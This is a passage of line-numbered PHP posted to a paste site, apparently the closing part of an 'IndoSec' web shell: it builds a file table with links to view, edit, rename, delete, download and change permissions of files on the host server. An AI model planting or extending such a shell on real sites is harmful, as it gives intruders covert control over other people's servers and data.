  2528. <td><a href="?dir='.$path.'&aksi=chmod_file&file='.$path.'/'.$file.'" class="text-center">';
  2529. if(is_writable($path.'/'.$file)) echo '<font color="#00ff00">';
  2530. elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
  2531. echo perms($path.'/'.$file);
  2532. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font></a></td>
  2533. <td class="d-flex">
  2534. <a title="Lihat" class="badge badge-info" href="?dir='.$path.'&aksi=view&file='.$path.'/'.$file.'">&nbsp;<i class="fa fa-eye"></i>&nbsp;</a>&nbsp;&nbsp;
  2535. <a title="Edit" class="badge badge-success" href="?dir='.$path.'&aksi=edit&file='.$path.'/'.$file.'">&nbsp;<i class="far fa-edit"></i>&nbsp;</a>&nbsp;&nbsp;
  2536. <a title="Rename" class="badge badge-success" href="?dir='.$path.'&aksi=rename&file='.$path.'/'.$file.'">&nbsp;<i class="fa fa-pencil"></i>&nbsp;</a>&nbsp;&nbsp;
  2537. <a title="Delete" class="badge badge-danger" href="?dir='.$path.'&aksi=hapusf&file='.$path.'/'.$file.'" title="Delete">&nbsp;<i class="fa fa-trash"></i>&nbsp;</a>&nbsp;&nbsp;
  2538. <a title="Download" class="badge badge-primary" href="?&dir='.$path.'&aksi=download&file='.$path.'/'.$file.'" title="Download">&nbsp;<i class="fa fa-download"></i>&nbsp;</a>
  2539. </td>
  2540. </tr>';
  2541. }
  2542. echo '</table></div></div></div><hr/>
  2543. <center><a class="text-muted" href="https://facebook.com/IndoSecOfficial">Copyright 2019 { IndoSec }</a></center><br/>';
  2544. echo "<a href='#' class='scrollToTop'><i class='fa fa-arrow-up up' aria-hidden='true'></i></a>";
  2545. /*
  2546. End
  2547. */
  2548. ?>
Add Comment
Please, Sign In to add comment